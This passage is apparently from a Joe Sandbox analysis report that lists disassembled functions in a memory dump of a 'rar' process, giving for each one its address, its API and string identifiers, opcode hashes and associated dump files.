                                                                                                                                                                                                                                      • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                      • Instruction ID: 68efaad5305c8b772e33ab37127efbf257ba96b3cdfef53a2c57db61c53d6172
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84314061A19A8196FB30DB21E5553E977E4FB88B84F8040F9EA8DC3656DF3CE605C740
                                                                                                                                                                                                                                      Function 00007FF69A3E7188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                                                                                      • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2522007465-2120454788
                                                                                                                                                                                                                                      • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                      • Instruction ID: 97d2e97d0736497e3de729ccf9a83e80050e66111fd522d7c012b4d3456a5a45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B217C65A0DA4286EA319B11B84827877E1FF91FC0F6441F9EA5DC3B94EF2CE9468300
                                                                                                                                                                                                                                      Function 00007FF69A42BE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                                      • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                                      • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                                      • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                      • Instruction ID: cc425bf0241a520b2998685b4a4d8ec779afbc5329d12d9e24ded7dcfa842747
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7821F576A182418EE760CF65E480AAD77F0F748B94F1450B6EE48D3B48DF38E8428F10
                                                                                                                                                                                                                                      Function 00007FF69A4424D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                      • Instruction ID: 2ecd09dbb9695b7fa60be971a207b4ba4ae153d785bcf49c3b425d6dec47c0ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91F04925A19A4281EFA98F11F49027973E0EF88F80F4820F9EA4FC6664DE3CE484C700
                                                                                                                                                                                                                                      Function 00007FF69A44C654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                      • Instruction ID: 664437afd38555c0b9faaf903acfe0f0719bf45de2e0511d9b149e3f91e2a332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68A1B962A4878296FB708F6190403BA76E1EF44FA4F4846F6DA6D877D5EF7CE4448340
                                                                                                                                                                                                                                      Function 00007FF69A447AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                      • Instruction ID: f5412006c9c488846f5223d8a9387dafb6eb95a8c8df2e095162876a2ece0eec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0581C962E28A528AF7309F6598806BD76E6FB44F88F4441F5DE0E93791DF3CA462C310
                                                                                                                                                                                                                                      Function 00007FF69A447428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3659116390-0
                                                                                                                                                                                                                                      • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                      • Instruction ID: e6da8d877130ce1fdeb539ee070e2cb83bcf3d2596591ca60e813c608ede6aa8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B51BD72E14A518AF721CF25E8443AC7BF2FB48B98F0481B5DE4A97A99DF38D152C700
                                                                                                                                                                                                                                      Function 00007FF69A3F80C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 643171463-0
                                                                                                                                                                                                                                      • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                      • Instruction ID: e487865da40d784138d5f7251e26e484039622b4bca566e7376054ba1f647f08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0341C161E18A4242FA349B21E9012BA72E0EF45FA0F0013F9EEAED77D5DE3CA5459740
                                                                                                                                                                                                                                      Function 00007FF69A4469B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 190572456-0
                                                                                                                                                                                                                                      • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                      • Instruction ID: e796b930024e704d0c1a95636fc3938ac0e62554bc4ff29ceaf21bc0295b5e64
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6641BE61B0AA4296FA358F46A8006B5B2E5FF46F90F1985F5DE5ECF384EE3CE4409340
                                                                                                                                                                                                                                      Function 00007FF69A44DC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                      • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                      • Instruction ID: 1ec67044753a835385304de6d7fb620fa42dc1a0aa4eb228cf1476f9d2068d9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0115476F1CA0385F6741A24EC9637931C1EF95FA4E0846F4E96EC76D6CEACA4405301
                                                                                                                                                                                                                                      Function 00007FF69A3F7514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcschr$BeepMessage
                                                                                                                                                                                                                                      • String ID: ($[%c]%ls
                                                                                                                                                                                                                                      • API String ID: 1408639281-228076469
                                                                                                                                                                                                                                      • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                      • Instruction ID: c3dfff93b70515a1aca20cad394653a8b77778fc4188be14df9f51406764882b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A81C422A18A4182EAB4CF05E4402BA77E1FB88B88F5405BAEF4ED7755EF3CE541C700
                                                                                                                                                                                                                                      Function 00007FF69A406FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
